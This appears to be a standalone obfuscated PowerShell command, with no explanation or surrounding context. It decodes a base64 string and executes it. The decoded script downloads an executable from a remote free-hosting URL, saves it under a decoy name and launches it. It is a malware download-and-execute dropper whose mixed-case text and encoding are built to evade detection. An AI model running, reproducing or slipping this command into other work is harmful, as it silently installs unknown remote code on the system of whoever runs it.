iex([SYstEm.text.EncOdIng]::utf8.gEtsTRING([SYSTem.coNverT]::fRombAse64STriNg('CihOZXctT2JqZWN0IHN5c3RFTS5OZVQud2ViY2xpZU50KS5kT3dubG9hRGZJbEUoJ2h0dHA6Ly9tYXRrYWx2LjVnYmZyZWUuY29tL2xvc28vZmFzb28uZXhlJywnZmxlZWJsZS5leGUnKTtTdGFydC1Qcm9jZXNzICdmbGVlYmxlLmV4ZScKCg==')));exit

